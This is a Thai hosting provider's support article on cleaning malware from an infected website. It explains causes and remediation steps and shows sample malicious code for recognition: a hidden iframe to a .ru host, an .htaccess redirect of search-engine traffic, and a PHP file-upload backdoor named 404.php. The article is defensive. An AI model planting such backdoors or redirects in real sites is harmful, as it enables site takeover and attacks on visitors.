Knowledgebase | Web Hosting Support

Search:     Advanced search

เว็บไซต์ติดไวรัส ทำยังไงดี!!

Add comment
Views: 10268
Votes: 0
Comments: 0
Posted: 03 พ.ค., 2010
by:
Updated: 22 ก.ย., 2013
by: Sianglew P.
เว็บไซต์ติดไวรัส ทำยังไงดี!!

หน้าเว็บไซต์ติดไวรัส, เว็บไซต์อันตราย, เว็บถูกบล๊อค



สาเหตุของปัญหาเว็บไซต์ติดไวรัส

    -  กรณีใช้เป็น opensource เช่น joomla, smf board, wordpress, ฯลฯ ไม่มีการ upgrade โปรแกรม หรือ แก้ permission สิทธิของไฟล์ให้เหมาะสม
    -  กรณีใช้งาน Flash ตัวโปรแกรม flash เองจะมีการใช้งาน script ที่เป็น .js (java) หากไม่มีการ upgrade โปรแกรม flash ก็จะมีช่องโหว่
    -  กรณีใช้งาน code iframe ควรจะเปลี่ยนไปเป็น code DIV แทน เพื่อปิดช่องโหว่ของ iframe
    -  กรณีใช้ source free เช่น jquery, code editor, template, module, component, plugin ซึ่งดาวโหลดจากที่อื่นมาใช้งานในเว็บไซต์
และไม่มีการอัพเกรด หรือแก้ permission สิทธิของไฟล์ให้เหมาะสม

วิธีการตรวจสอบไฟล์เว็บไซต์ติดไวรัส

1.  ทำการ ดาวโหลดไฟล์จากโฮสติ้ง ลงมาตรวจสอบที่เครื่องคอมพิวเตอร์ ผ่านโปรแกรม FTP  วิธีการใช้งาน ftp
2.  ให้สังเกตุ วันที่มีการแก้ไขไฟล์เว็บไซต์ล่าสุด โดยที่เราไม่ได้เป็นผู้แก้ไข อาจจะมี script virus แทรกอยู่
3.  ให้สังเกตุไฟล์ที่มีชื่อแปลกๆ เช่น .htaccess, 404.php, 1234.php, xx.php, xdfasfsd.html ฯลฯ อาจจะมี script virus แทรกอยู่
4.  หากใช้เป็น opensource ให้ทำการอัพเกรด โปรแกรมให้เป็นเวอร์ชั่นใหม่เสมอ เพื่อป้องกันช่องโหว่ของเว็บไซต์
(ควรปิด module, component, plugin ที่ไม่ได้เป็นค่ามาตราฐานที่มาพร้อมกับโปรแกรม opensource ทั้งหมดก่อนทำการอัพเกรด
และ ก่อนการอัพเกรด ต้องทำการสำรองข้อมูลไว้ เพื่อป้องกันกรณีใช้งานไม่ได้)
5.  ทำการ ลบข้อมูลเว็บไซต์เดิม ที่อยู่บนโฮสติ้ง ออกทั้งหมด
6.  ทำการอัพโหลดข้อมูลขึ้นไปบนโฮสติ้ง อีกครั้ง
7.  ทำการแก้สิทธิเจ้าของไฟล์ (permission) ให้เหมาะสม หากเว็บไซต์ไม่ต้องการเปลี่ยนแปลงควรแก้สิทธิเป็น
444 หรือ 555 สำหรับการอ่านข้อมูลอย่างเดียว
8.  ทำการสมัคร google webmaster tool สำหรับช่วยตรวจสอบเว็บไซต์

ตัวอย่าง code script virus

ตัวอย่างที่ 1 (ข้อสังเกตุ มักจะพบมาจาก .ru / และถูกซ้อนด้วย tag style="visibility: hidden" )

<iframe src="hxxp://xxx.ru:8080/index.php" width=145 height=199 style="visibility: hidden"></iframe>

ตัวอย่างที่ 2 (ส่วนใหญ่จะอยู่ในไฟล์ .js)

function DOMException(c){Error.apply(this,arguments);this.code=c;var b=["","Index Size Error","DOMString Size Error","
Hierarchy Request Error","Wrong Document Error","Invalid Character Error","No Data Allowed Error","
No Modification Allowed Error","Not Found Error","Not Supported Error","Inuse Attribute Error","Invalid State Error","
Syntax Error","Invalid Modification Error","Namespace Error","Invalid Access Error"];this.message=b[c];

ตัวอย่างที่ 3 (จะอยู่ในไฟล์ .htaccss)

ให้สังเกตุ base64_decode

หรือ มีการทำ rewrite เปลี่ยน ลิงค์เว็บไซต์เราให้ไปที่เว็บไซต์อื่น

<IfModule mod_rewrite.c> RewriteEngine On RewriteCond % ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|
RewriteRule ^(.*)$ lam-siu.ru/indigo?5 [R=301,L] RewriteCond %

ตัวอย่างที่ 4 (จะอยู่ในไฟล์ที่ชื่อแปลกๆ จะมีการเขียน code ให้มีการ upload virus ไปยังเว็บไซต์)

เช่น ไฟล์ 404.php

<?php if (isset($_FILES["elf"]) and ! $_FILES["elf"]["error"] ) {@move_uploaded_file($_FILES["elf"]["tmp_name"], $_FILES["elf"]["name"]) ;      echo $ifupload=" ItsOk ";}  ?>




Others in this Category

document เมื่อใช้พื้นที่จนเต็มสามารถที่จะ upgrade hosting plan ได้หรือไม่
document เซิร์ฟเวอร์ของ ไชโย โฮสติ้ง ตั้งอยู่ที่ไหน
document ต้องใช้เวลานานเท่าไรหลังจากที่จ่ายเงินแล้วถึงจะสามารถ อัพโหลดเว็บไซต์ได้
document สามารถอัพโหลดเว็บไซต์ได้ตลอดเวลาหรือไม่
document สามารถที่จะนำรูปโป๊หรือข้อความลามกอนาจาร มาไว้กับไชโย โฮสติ้งได้หรือไม่
document ต้องใช้เครื่องมืออะไรบ้างในการบริการใช้โฮสติ้ง กับไชโย โฮสติ้ง
document มีการรับประกันคืนเงินให้ภายใน 30 วันหรือไม่
document สามารถตรวจสอบได้หรือไม่ว่ามีคนเข้ามาดูเว็บไซต์กี่ครั้ง
document ไชโย โฮสติ้งมี cronjobs ให้หรือไม่
document Spam คืออะไร
document จะเกิดอะไรขึ้นถ้าใช้พื้นที่หรือ data transfer เกินกว่าที่กำหนดไว้
document ชื่อของ Domain Name Server ของบริษัทไชโย โฮสติ้ง ชื่ออะไร
document ไชโย โฮสติ้งมีบริการ technical supportหรือไม่
document จะสามารถทำการติดต่อกับ technical support ของ ไชโย โฮสติ้งได้อย่างไร
document ใช้ Microsoft FrontPage กับไชโย โฮสติ้งได้หรือไม่
document ไชโย โฮสติ้งเป็นแค่ Reseller หรือเปล่า
document 99.9% Uptime หรือเปล่า
document สามารถใช้ภาษา ASP, ASP.NET หรือ JSP กับไชโย โฮสติ้งได้หรือไม่
document เซิร์ฟเวอร์ของ ไชโย โฮสติ้ง สามารถรันภาษาใดได้บ้าง
document ไชโย โฮสติ้ง มี Database ให้ใช้หรือไม่
document สามารถสร้าง Database ได้เองหรือไม่
document ถ้าต้องการแสดง error บนหน้าเว็บเพจของ php จะต้องทำอย่างไรบ้าง
document ถ้าต้องการให้ Register_Globals on จะต้องทำอย่างไรบ้าง
document ถ้าต้องการลบ log file สามารถทำได้หรือไม่
document สามารถที่จะสั่งซื้อโดเมนเนมพร้อมกับเว็ปโฮสติ้งได้พร้อมกันหรือไม่
document อัพโหลดเวปขึ้น hosting แล้ว Error : File 'c:\mysql\share\charsets\?.conf' not found (Errcode: 2)...
document หน้าเวปตัวหนังสือเป็น ??? ทั้งที่ใน phpmyadmin เป็นภาษาไทย
document ใช้ฐานข้อมูลเป็น MS Sql แล้วเข้าหน้า WebAdmin ของฐานข้อมูลไม่ได้
document ทำไมเข้าเว็ปอื่นได้ปกติ แต่บางเว็ปเข้าไม่ได้
document เข้าเว็บต่างประเทศช้า สามารถ test speed จากต่างประเทศ
document วิธีการเรียงลำดับการเปิดไฟล์ index สำหรับ server linux
document ใช้ fire fox เข้าจัดการโฮสติ้งในส่วนของ control panel แล้ว error ต้องทำอย่างไร ?
document ใช้ ie เข้าจัดการโฮสติ้งในส่วนของ control panel แล้ว error ต้องทำอย่างไร ?
document สำหรับ server linux ถ้าต้องการให้ PHP magic_quotes_gpc on จะต้องทำอย่างไรบ้าง
document ต้องการใช้งานใน E-mail ของ Google Apps ต้องทำอย่างไร
document ขั้นตอนการลงทะเบียน สมัครใช้งานบริการ E-mail กับ Google Apps
document หากต้องการทำ Directory Listing กับ server linux
document วิธีการเปลี่ยน permission ของ folder หรือ file ที่เป็น plesk windows
document วิธีแก้ปัญหา virus java iframe แทรก code ลงในไฟล์ index
document การ upgrade เวอร์ชั่น ของ Smf Board
document วิธีการ backup file และ database
document วิธีการใช้ ftp อัพโหลดข้อมูลเว็บไซท์ โดย CuteFTP
document การตรวจสอบ IP ว่าติด Black List หรือไม่? และการปลดล็อค IP ที่ติด black list
document การเปลี่ยน collation MySQL
document plesk control paenl จะทำการเปลี่ยนหน้าที่แสดง error อย่างไร
document Set อีเมล์ผู้ใช้งาน Google apps ใช้งานกับโปรแกรม outlook
document การป้องกัน และ ตรวจสอบแก้ไข Error 0x800C0133 (Outlook inbox folder full)
document วิธีการเปลี่ยน DNS Server สำหรับ Windows XP
document ปลดล็อค "เว็บไซท์ อันตราย" กับ webmaster tool
document การทดสอบเว็บไซต์ก่อนการชี้ค่า dns
document Telnet การตรวจสอบ port การใช้งานอีเมล์
document วิธีการเพิ่มเวลาในการ execut php scripts (max_execution_time) ทำอย่างไร?
document Enable คำสั่ง Telnet บน Windows 7
document วิธีการทำให้สามารถอ่าน file หรือ folder ภาษาไทย ได้และใช้ mod_rewrite เพื่อทำ url ภาษาไทย
document การใช้งานโปรแกรม CuteFTP (Active Mode)
document โปรแกรม TeamViewer Remote Deasktop
document วิธีการเปลี่ยน File hosts
document ใช้ Firefox เข้า Plesk Control Panel แล้ว Error : Issuer certificate is invalid (Error code: sec_error_ca_cert_invalid)
document ใช้ Google chrome เข้า control panel แล้ว Error : Your connection is not private